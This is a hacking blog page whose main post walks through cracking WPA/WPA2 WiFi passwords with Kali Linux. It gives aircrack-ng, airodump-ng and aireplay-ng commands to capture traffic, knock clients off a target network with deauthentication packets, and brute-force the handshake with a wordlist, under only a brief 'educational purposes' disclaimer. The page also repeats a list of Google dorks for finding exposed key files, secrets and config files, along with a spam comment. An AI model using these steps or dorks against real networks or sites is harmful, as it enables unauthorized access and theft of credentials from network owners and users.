Skip to main content

Google SQL Dorks – 2021

"index of" "plugins/wp-rocket" intitle:"index of" secrets.yml intitle:"index of /" "*key.pem" intitle:"index of" "admin/sql/" intext:"index of /" "config.json" index of .svn/text-base/index.php.svn-base intitle:"index of" admin.tar inurl:/servicedesk/customer/user/login Dork: "Index of" "upload_image.php" Dork: "index of" "Production.json" index.of.?.frm inurl:wp-content/plugins/brizy "Index of" "customer.php" inurl:adminlogin.jsp inurl:/download_file/ intext:"index of /" index of /backend/prod/config intext:"index of /" "customer.php" "~Login" intext:"INTERNAL USE ONLY" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx intext:"Welcome to Intranet" "login" "Index of" "/access" inurl:admin/data* intext:index of intext:powered by JoomSport - sport Wo

How to Hack WPA/WPA2 WiFi Using Kali Linux?


 
Note: 

Use the below methods only for educational/testing purposes on your own wifi or with the permission of the owner. Don’t use this for malicious purposes.


Step 1: 

ifconfig (interface configuration) : To view or change the configuration of the network interfaces on your system.

ifconfig


Here,

  • eth0 : First Ethernet interface
  • l0 : Loopback interface
  • wlan0 : First wireless network interface on the system. (This is what we need.)

Step 2: 


Stop the current processes which are using the WiFi interface.

airmon-ng check kill



Step 3: 


To start the wlan0 in monitor mode.

airmon-ng start wlan0





Step 4: 


To view all the Wifi networks around you.

airodump-ng wlan0mon



Here,

  • airodump-ng : For packet capturing
  • wlan0mon : Name of the interface (This name can be different on the different devices)

Press Ctrl+C to stop the process when you have found the target network.


Step 5: 


To view the clients connected to the target network.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon



Here,

  • airodump-ng : For packet capturing
  • -c : Channel
  • –bssid : MAC address of a wireless access point(WAP).
  • -w : The Directory where you want to save the file(Password File).
  • wlan0mon : Name of the interface.


Step 6: 


Open a new terminal window to disconnect the clients connected to the target network.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon



  • aireplay-ng : To inject frames
  • -0 : For deauthentication
  • 10 : No. of deauthentication packets to be sent
  • -a : For the bssid of the target network
  • wlan0mon : Name of the interface.

When the client is disconnected from the target network. He tries to reconnect to the network and when he does you will get something called WPA handshake in the previous window of the terminal.



Now, we are done with capturing the packets. So, now you can close the terminal window.



Step 7. 


To decrypt the password. Open the Files application.



Here,


  • hacking-01.cap is the file you need.
    aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program
  • -a : -a2 for WPA2 & -a for WPA network
  • -b : The BSSID of the target network
  • -w : Location of the wordlist file
  • /root/hacking-01.cap : Location of the cap file

You can download the file of common passwords from the internet and if you want to create your own file then you can use the crunch tool





Comments

  1. idm full crack is an open source FPS (First Person Shooter) for computers.








    ReplyDelete

Post a Comment

Popular posts from this blog

Google SQL Dorks – 2021

"index of" "plugins/wp-rocket" intitle:"index of" secrets.yml intitle:"index of /" "*key.pem" intitle:"index of" "admin/sql/" intext:"index of /" "config.json" index of .svn/text-base/index.php.svn-base intitle:"index of" admin.tar inurl:/servicedesk/customer/user/login Dork: "Index of" "upload_image.php" Dork: "index of" "Production.json" index.of.?.frm inurl:wp-content/plugins/brizy "Index of" "customer.php" inurl:adminlogin.jsp inurl:/download_file/ intext:"index of /" index of /backend/prod/config intext:"index of /" "customer.php" "~Login" intext:"INTERNAL USE ONLY" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx intext:"Welcome to Intranet" "login" "Index of" "/access" inurl:admin/data* intext:index of intext:powered by JoomSport - sport Wo

13 BEST Operating System for Hacking in 2021

  1) Kali Linux     Kali Linux is a Security Distribution of Linux specifically designed for digital forensics and penetration testing. It has over 600 preinstalled penetration-testing applications (cyber-attack performs against computer vulnerability). This OS can be run on Windows as well as Mac OS. Features: It can be used for penetration testing. This platform is available in 32 bits as well as 64 bits. Kali Linux can be updated without the need to download a new version. This OS can encrypt the full disk. You can easily automate and customize the Kali Linux installation on the network. Support for USB live installs. It has a forensics mode that can be used for forensic work. Link:   https://www.kali.org/ 2) Parrot OS Parrot OS is a platform for hacking. It has an easy to use editor for software development. This platform enables you to surf the web privately and securely. Hackers can use Parrot OS to perform vulnerability assessment, penetration testing, computer forensics, and mo

Common types of cyber attacks

  Malware Malware is a term used to describe malicious software, including spyware, ransomware, viruses, and worms. Malware breaches a network through a vulnerability, typically when a user clicks a dangerous link or email attachment that then installs risky software. Once inside the system, malware can do the following: Blocks access to key components of the network (ransomware) Installs malware or additional harmful software Covertly obtains information by transmitting data from the hard drive (spyware) Disrupts certain components and renders the system inoperable Phishing Phishing is the practice of sending fraudulent communications that appear to come from a reputable source, usually through email. The goal is to steal sensitive data like credit card and login information or to install malware on the victim’s machine. Phishing is an increasingly common cyberthreat. Man-in-the-middle attack Man-in-the-middle (MitM) attacks, also known as eavesdropping attacks, occur when attackers i